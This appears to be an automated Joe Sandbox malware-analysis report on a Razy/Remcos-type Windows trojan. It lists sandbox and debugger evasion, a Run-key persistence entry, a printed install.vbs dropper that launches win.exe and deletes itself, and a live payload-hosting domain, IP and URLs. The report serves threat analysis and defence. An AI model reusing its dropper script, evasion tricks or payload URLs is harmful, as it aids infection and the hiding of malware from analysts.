Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	RDTSC instruction interceptor: First address: 0000000000543047 second address: 0000000000543047 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	RDTSC instruction interceptor: First address: 00000000005620EF second address: 00000000005620EF instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	RDTSC instruction interceptor: First address: 0000000000543047 second address: 0000000000543047 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	RDTSC instruction interceptor: First address: 00000000005620EF second address: 00000000005620EF instructions:

Source: C:\Windows\SysWOW64\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Code function: 19_2_00566C78 rdtsc

19_2_00566C78

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWo
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:U
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Code function: 19_2_005604B6 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000

19_2_005604B6

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Code function: 19_2_00566C78 rdtsc

19_2_00566C78

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Code function: 19_2_00563E23 LdrInitializeThunk,

19_2_00563E23

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00562286 mov eax, dword ptr fs:[00000030h]	19_2_00562286
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00563008 mov eax, dword ptr fs:[00000030h]	19_2_00563008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00562034 mov eax, dword ptr fs:[00000030h]	19_2_00562034
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005661D3 mov eax, dword ptr fs:[00000030h]	19_2_005661D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005661C4 mov eax, dword ptr fs:[00000030h]	19_2_005661C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00564A7C mov eax, dword ptr fs:[00000030h]	19_2_00564A7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00566207 mov eax, dword ptr fs:[00000030h]	19_2_00566207
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00561AA2 mov eax, dword ptr fs:[00000030h]	19_2_00561AA2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_005622A1 mov eax, dword ptr fs:[00000030h]	19_2_005622A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Code function: 19_2_00565364 mov eax, dword ptr fs:[00000030h]	19_2_00565364

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior

Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder1	Process Injection12	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion22	LSASS Memory	Security Software Discovery731	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery212	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Razy.845229.27038.exe	35%	Virustotal		Browse
SecuriteInfo.com.Variant.Razy.845229.27038.exe	40%	ReversingLabs	Win32.Trojan.Razy
SecuriteInfo.com.Variant.Razy.845229.27038.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\win.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\win.exe	35%	Virustotal		Browse
C:\Users\user\AppData\Roaming\win.exe	40%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mtspsmjeli.sch.id	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin	13%	Virustotal		Browse
http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mtspsmjeli.sch.id	103.150.60.242	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.150.60.242	unknown	unknown		45325	PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356590
Start date:	23.02.2021
Start time:	11:49:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Razy.845229.27038.1852 (renamed file extension from 1852 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/3@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 64.4% (good quality ratio 8.4%) Quality average: 5.5% Quality standard deviation: 15.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.88.21.125, 13.64.90.137, 104.43.193.48, 104.43.139.144, 51.104.139.180, 52.147.198.201, 52.255.188.83, 51.103.5.159, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.20.56 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:54:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
11:54:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.150.60.242	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/VOP.exe
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	XP 6.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/CUN.exe
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AWT.exe
	TT.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
	w0JlVAbpIT.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	3661RJTi5M.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	TgrhfQLDyB.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	4hW0TZqN01.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
	vTQWcy77WI.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	LdOgPDsMEf.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	OXplew3YfS.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
	pWokqkAwi2.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	FT102038332370.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/OSE.exe
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AQT.exe
	Payment Confirmation .xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AET.exe
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/UDI.exe
	14 nights highlight tour.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/WAH.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mtspsmjeli.sch.id	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242
	14 nights highlight tour.doc	Get hash	malicious	Browse	103.150.60.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242
	14 nights highlight tour.doc	Get hash	malicious	Browse	103.150.60.242

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\install.vbs Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
File Type:	data
Category:	modified
Size (bytes):	404
Entropy (8bit):	3.476487137149483
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
MD5:	0AC72B36AE19DF5DD84381E07A64BA3B
SHA1:	194801CB7059E67ABF5A38E709D856A8095A71EE
SHA-256:	B17BD1B45A2144EAA120C3EE9BB97622B2A54B0D36A69B3750AF2678D359D14D
SHA-512:	DA76EC5A6C11DE83532AED125DF88B43BABD72774EC8A91C05697E4941F9C8DB2757402787C40EB08DFD82A0927A8A301F84FEE5EDE10D2DB56CC7B0BB429604
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\win.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	5.194335934479938
Encrypted:	false
SSDEEP:	1536:Bb7/1JxTzAXah9um4sC0COiM9vuDjb7/1Jx:vzAqnQ0eM9i
MD5:	869EAE0220A293DCABF4051DD323BBD8
SHA1:	395E7683548C8A25C4963E3E3C56B04B76DBF0B7
SHA-256:	496FA2A5A6ABBC22D6A4C63E31847156D61C240D8E3A793E1B4DE46E09827B52
SHA-512:	DD9FB27D7554C13C691CF8836911C9B7E93FE83908895DE00D92C11A68EC2050B26D2ED2F7B8F76A7990F5F7A42E8468A2B5078378D5DAD653D71C07D95B8705
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 35%, Browse Antivirus: ReversingLabs, Detection: 40%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\..H.................@...p......x........P....@.................................I\.......................................>..(........0..................................................................8... ....................................text....3.......@.................. ..`.data...`%...P.......P..............@....rsrc....0.......@...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.194335934479938
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Razy.845229.27038.exe
File size:	106496
MD5:	869eae0220a293dcabf4051dd323bbd8
SHA1:	395e7683548c8a25c4963e3e3c56b04b76dbf0b7
SHA256:	496fa2a5a6abbc22d6a4c63e31847156d61c240d8e3a793e1b4de46e09827b52
SHA512:	dd9fb27d7554c13c691cf8836911c9b7e93fe83908895de00d92c11a68ec2050b26d2ed2f7b8f76a7990f5f7a42e8468a2b5078378d5dad653d71c07d95b8705
SSDEEP:	1536:Bb7/1JxTzAXah9um4sC0COiM9vuDjb7/1Jx:vzAqnQ0eM9i
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\..H.................@...p......x........P....@

File Icon


Icon Hash:	d8d490d4ccbcdeeb

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48C5A15C [Mon Sep 8 22:04:12 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5fb04c04dc9621084e24b4642ca2fed6

Entrypoint Preview

Instruction
push 0040FEB8h
call 00007F3244D0E2D5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+20h], ch
out 82h, eax
xchg eax, ecx
mov ch, 39h
dec edi
mov dword ptr [ecx-64h], ecx
sub byte ptr [ecx-2Dh], al
mov edi, 00000060h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx+00h], al
push es
push eax
add dword ptr [ecx], 49h
outsb
imul esi, dword ptr [ebx+73h], 6C626175h
bound esp, dword ptr [ebp+73h]
je 00007F3244D0E357h
bound eax, dword ptr [eax]
add byte ptr [eax], al
add al, dl
inc edi
or byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or eax, E492673Ch
sar dword ptr [esi-6772BA15h], 22h
xchg byte ptr fs:[esi+edi], dh
inc esp
pop es
movsd
sub edx, esi
jne 00007F3244D0E2E8h
ror byte ptr [edx-50h], FFFFFF91h
xor byte ptr [edx], cl
insb
mov dl, 6Ah
mov bh, 3Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
in al, DAh
add byte ptr [eax], al
push eax
sub eax, 0F000000h
add byte ptr [edx+52h], al
pop ecx
dec esi
push ebx
dec ebx
dec edi
push esi
push ebp
dec esi
push eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13ef4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x30a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x114	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
